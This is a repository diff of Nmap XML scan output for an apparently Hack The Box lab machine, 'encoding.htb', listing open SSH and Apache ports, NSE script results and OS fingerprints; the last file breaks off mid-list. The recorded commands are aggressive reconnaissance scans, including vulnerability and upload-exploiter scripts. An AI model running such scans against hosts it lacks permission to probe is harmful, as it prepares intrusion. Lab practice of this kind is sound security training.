Content-Encoding: gzip
Content-Length: 814
Connection: close
Content-Type: text/html; charset=UTF-8

84
HTB/encoding/results/scans/tcp80/xml/tcp_80_http_nmap.xml Normal file
View File

@@ -0,0 +1,84 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2" start="1674932845" startstr="Sat Jan 28 20:07:25 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="SYN Stealth Scan" time="1674932846"/>
<taskend task="SYN Stealth Scan" time="1674932846" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674932846"/>
<taskend task="Service scan" time="1674932852" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674932852"/>
<taskprogress task="NSE" time="1674932883" percent="99.02" remaining="1" etc="1674932883"/>
<taskprogress task="NSE" time="1674932913" percent="99.67" remaining="1" etc="1674932913"/>
<taskprogress task="NSE" time="1674932943" percent="99.67" remaining="1" etc="1674932943"/>
<taskprogress task="NSE" time="1674932973" percent="99.67" remaining="1" etc="1674932973"/>
<taskprogress task="NSE" time="1674933003" percent="99.67" remaining="1" etc="1674933003"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<host starttime="1674932846" endtime="1674933006"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-vuln-cve2017-1001000" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-referer-checker" output="&#xa;Spidering limited to: maxpagecount=30&#xa; https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js&#xa; https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js&#xa;"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-headers" output="&#xa; Date: Sat, 28 Jan 2023 19:07:19 GMT&#xa; Server: Apache/2.4.52 (Ubuntu)&#xa; Connection: close&#xa; Content-Type: text/html; charset=UTF-8&#xa; &#xa; (Request type: HEAD)&#xa;"/><script id="http-comments-displayer" output="&#xa;Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 29&#xa; Comment: &#xa; /* The textarea itself */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 14&#xa; Comment: &#xa; /* Containing areas */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 41&#xa; Comment: &#xa; /* The status bar */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 1&#xa; Comment: &#xa; /* Import Google Font */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 63&#xa; Comment: &#xa; /* The submit button */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 4&#xa; Comment: &#xa; /* RESET */&#xa;"/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-fileupload-exploiter" output="&#xa; &#xa; Couldn&apos;t find a file-type field.&#xa; &#xa; Couldn&apos;t find a file-type field."><table>
<elem>Couldn&apos;t find a file-type field.</elem>
</table>
<table>
<elem>Couldn&apos;t find a file-type field.</elem>
</table>
</script><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; /&#xa; Other: 1; php: 1&#xa; /assets/css/&#xa; css: 1&#xa; /assets/img/&#xa; png: 1&#xa; /assets/js/&#xa; js: 1&#xa; Longest directory structure:&#xa; Depth: 2&#xa; Dir: /assets/img/&#xa; Total files found (by extension):&#xa; Other: 1; css: 1; js: 1; php: 1; png: 1&#xa;"/><script id="http-date" output="Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time."><elem key="date">2023-01-28T19:07:18+00:00</elem>
<elem key="delta">-18.0</elem>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-traceroute" output="&#xa; HTML title&#xa; Hop #1: 400 Proxy Error&#xa; Hop #2: HaxTables&#xa; Hop #3: HaxTables&#xa; Status Code&#xa; Hop #1: 400&#xa; Hop #2: 200&#xa; Hop #3: 200&#xa; content-type&#xa; Hop #1: text/html; charset=iso-8859-1&#xa; Hop #2: text/html; charset=UTF-8&#xa; Hop #3: text/html; charset=UTF-8&#xa; content-length&#xa; Hop #1: 424&#xa; Hop #2&#xa; Hop #3&#xa;"/><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-malware-host" output="Host appears to be clean"/><script id="http-security-headers" output=""></script><script id="http-enum" output="&#xa; /includes/: Potentially interesting folder&#xa;"/><script id="http-php-version" output="Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa&#xa;Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa"/><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-chrono" output="Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms"/><script id="http-vhosts" output="&#xa;128 names had status 200"/></port>
</ports>
<times srtt="24650" rttvar="24650" to="123250"/>
</host>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<runstats><finished time="1674933006" timestr="Sat Jan 28 20:10:06 2023" summary="Nmap done at Sat Jan 28 20:10:06 2023; 1 IP address (1 host up) scanned in 160.94 seconds" elapsed="160.94" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

117
HTB/encoding/results/scans/xml/_full_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,117 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="SYN Stealth Scan" time="1674932816"/>
<taskend task="SYN Stealth Scan" time="1674932851" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1674932851"/>
<taskend task="Service scan" time="1674932857" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1674932871"/>
<taskend task="Traceroute" time="1674932871"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674932871"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674932882"/>
<taskbegin task="NSE" time="1674932882"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<host starttime="1674932816" endtime="1674932887"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65533">
<extrareasons reason="reset" count="65533" proto="tcp" ports="1-21,23-79,81-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="bits">256</elem>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
</table>
<table>
<elem key="bits">256</elem>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<portused state="closed" proto="udp" portid="36902"/>
<osmatch name="Linux 5.0" accuracy="95" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.4" accuracy="95" line="68103">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="94" line="68176">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="HP P2000 G3 NAS device" accuracy="93" line="35037">
<osclass type="storage-misc" vendor="HP" osfamily="embedded" accuracy="93"><cpe>cpe:/h:hp:p2000_g3</cpe></osclass>
</osmatch>
<osmatch name="Linux 4.15 - 5.6" accuracy="93" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="93" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="92" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Infomir MAG-250 set-top box" accuracy="92" line="59627">
<osclass type="media device" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6</cpe></osclass>
<osclass type="media device" vendor="Infomir" osfamily="embedded" accuracy="92"><cpe>cpe:/h:infomir:mag-250</cpe></osclass>
</osmatch>
<osmatch name="Ubiquiti AirMax NanoStation WAP (Linux 2.6.32)" accuracy="92" line="61697">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
<osclass type="WAP" vendor="Ubiquiti" osfamily="embedded" accuracy="92"><cpe>cpe:/h:ubnt:airmax_nanostation</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.7" accuracy="92" line="65885">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:3.7</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729&#xa;OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ&#xa;OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O&#xa;OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=&#xa;OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN&#xa;OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D&#xa;OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O&#xa;OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N&#xa;OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N&#xa;OS:%T=40%CD=S)&#xa;"/>
</os>
<uptime seconds="3975719" lastboot="Tue Dec 13 19:46:08 2022"/>
<distance value="2"/>
<tcpsequence index="262" difficulty="Good luck!" values="E618361A,593DA75B,E2320D48,4C9B4BB,C8D2C810,A696F0B3"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="ECF86448,ECF864AC,ECF86511,ECF86576,ECF865DA,ECF8663E"/>
<trace port="1025" proto="tcp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.62"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.90" host="encoding.htb"/>
</trace>
<times srtt="26038" rttvar="1163" to="100000"/>
</host>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<runstats><finished time="1674932887" timestr="Sat Jan 28 20:08:07 2023" summary="Nmap done at Sat Jan 28 20:08:07 2023; 1 IP address (1 host up) scanned in 71.78 seconds" elapsed="71.78" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

114
HTB/encoding/results/scans/xml/_quick_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,114 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="SYN Stealth Scan" time="1674932816"/>
<taskend task="SYN Stealth Scan" time="1674932818" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1674932818"/>
<taskend task="Service scan" time="1674932824" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1674932829"/>
<taskend task="Traceroute" time="1674932829"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674932829"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674932840"/>
<taskbegin task="NSE" time="1674932840"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<host starttime="1674932816" endtime="1674932845"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="998">
<extrareasons reason="reset" count="998" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676